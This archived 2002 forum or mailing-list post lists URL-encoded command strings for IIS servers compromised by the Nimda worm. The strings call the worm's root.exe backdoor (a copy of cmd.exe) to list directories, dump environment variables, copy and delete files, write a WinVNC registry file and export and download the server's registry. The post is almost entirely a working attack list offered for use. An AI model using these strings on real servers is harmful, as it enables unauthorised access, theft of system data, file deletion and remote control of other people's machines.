subject: nimda exploit strings
posted: Thu, 22 Aug 2002 22:45:27 +0100
should you find youself with a server cracked by Nimda, the following commands can be executed -
although since ROOT.EXE is a copy of CMD.EXE (the command interpreter), these are more an example:
dir traversal
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+dir+c:\..
dir current
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+dir+D:
dir root
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+dir+e:\
environment vars
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+set
quotation marks
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+dir+%22*.dll%22
copy command
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+copy+admin.dll+t.d
l
delete command
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+del+t.dll
type command
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+type+now.txt
redirection 1
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+dir%20%3e%20now.tx
t
redirection 2
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+echo+REGEDIT4 >winv
nc.reg
append blank line
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+echo. >>winvnc.reg
append line
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+echo [HKEY_LOCAL_MA
CHINE\SOFTWARE\ORL\WinVNC3\Default]%3e%3ewinvnc.reg
export registry
http://xxx.xxx.xxx.xxx/scripts/root.exe?/c+regedit%20/e%20reg
istry.txt
download registry
http://xxx.xxx.xxx.xxx/scripts/registry.txt
---
* Origin: [adminz] tech, security, support (192.168.0.2)
generated by msg2page 0.06 on Jul 21, 2006 at 19:04:37